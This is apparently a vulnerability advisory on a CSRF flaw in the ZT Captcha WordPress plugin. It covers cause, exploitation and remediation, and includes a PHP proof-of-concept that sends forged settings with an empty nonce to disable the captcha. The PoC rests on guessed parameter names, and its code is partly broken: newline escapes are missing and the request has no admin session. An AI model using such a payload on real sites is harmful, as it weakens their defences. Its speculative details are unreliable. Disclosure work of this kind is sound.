Atomic Edge analysis of CVE-2026-1075 (metadata-based):
This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the ZT Captcha WordPress plugin, affecting versions up to and including 1.0.4. The vulnerability allows unauthenticated attackers to modify the plugin’s settings by tricking an administrator into clicking a malicious link. The CVSS score of 4.3 indicates a medium-severity impact with low attack complexity and no confidentiality or availability impact.
Atomic Edge research identifies the root cause as improper nonce validation on the `save_ztcpt_captcha_settings` action. The vulnerability description states a nonce check can be bypassed by sending an empty token value. This suggests the plugin’s AJAX handler or admin POST handler likely uses `check_ajax_referer()` or `wp_verify_nonce()` but fails to validate the nonce parameter correctly when it is an empty string. This inference is based on the CWE-352 classification and the description. Without a code diff, this conclusion is derived from common WordPress security patterns.
Exploitation requires an attacker to craft a forged HTTP request targeting the plugin’s settings update endpoint. Based on WordPress conventions and the action name, the likely endpoint is `/wp-admin/admin-ajax.php` with the `action` parameter set to `save_ztcpt_captcha_settings`. An attacker would embed this request in a malicious webpage or link. When a logged-in administrator visits the page, the request executes without their consent. The payload would include POST parameters for the plugin’s settings, such as `ztcpt_captcha_key` or `ztcpt_captcha_secret`, and an empty `_wpnonce` or `nonce` parameter to bypass the check.
Remediation requires proper nonce validation. The plugin must ensure the nonce parameter is both present and valid before processing the request. The fix should replace a simple existence check with a strict verification using `wp_verify_nonce()` or `check_ajax_referer()`. These functions must reject empty or invalid nonce values. The patched code should also implement a capability check, such as `current_user_can(‘manage_options’)`, to ensure only authorized users can change settings.
The impact of successful exploitation is unauthorized modification of the ZT Captcha plugin’s configuration. Attackers could disable the captcha, change its keys, or alter its behavior to weaken site security. This could facilitate spam, brute-force attacks, or other malicious activities that the captcha was meant to prevent. The attack does not directly lead to privilege escalation or remote code execution, but it can degrade the site’s security posture.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1075 - ZT Captcha <= 1.0.4 - Cross-Site Request Forgery to Settings Update
<?php
/**
* Proof of Concept for CVE-2026-1075.
* This script simulates a CSRF attack against the ZT Captcha plugin.
* It sends a POST request to the WordPress AJAX endpoint with an empty nonce.
* Assumptions:
* 1. The vulnerable endpoint is /wp-admin/admin-ajax.php.
* 2. The action parameter is 'save_ztcpt_captcha_settings'.
* 3. The nonce parameter is '_wpnonce' and an empty value bypasses the check.
* 4. The plugin accepts settings parameters like 'ztcpt_captcha_key'.
* This PoC is for authorized security testing only.
*/
$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/admin-ajax.php';
// Simulated malicious settings to disable or compromise the captcha.
$post_fields = [
'action' => 'save_ztcpt_captcha_settings',
'_wpnonce' => '', // Empty nonce to bypass validation.
'ztcpt_captcha_key' => 'malicious_key',
'ztcpt_captcha_secret' => 'malicious_secret',
'ztcpt_captcha_enabled' => '0' // Disable the captcha.
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
// Simulate a request from a victim's browser session (requires a logged-in admin).
// In a real attack, this would be triggered via a malicious page.
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "Atomic Edge PoC - CVE-2026-1075n";
echo "Target: $target_urln";
echo "HTTP Response Code: $http_coden";
echo "If the request succeeds (e.g., returns 200), the settings were likely updated.n";
?>
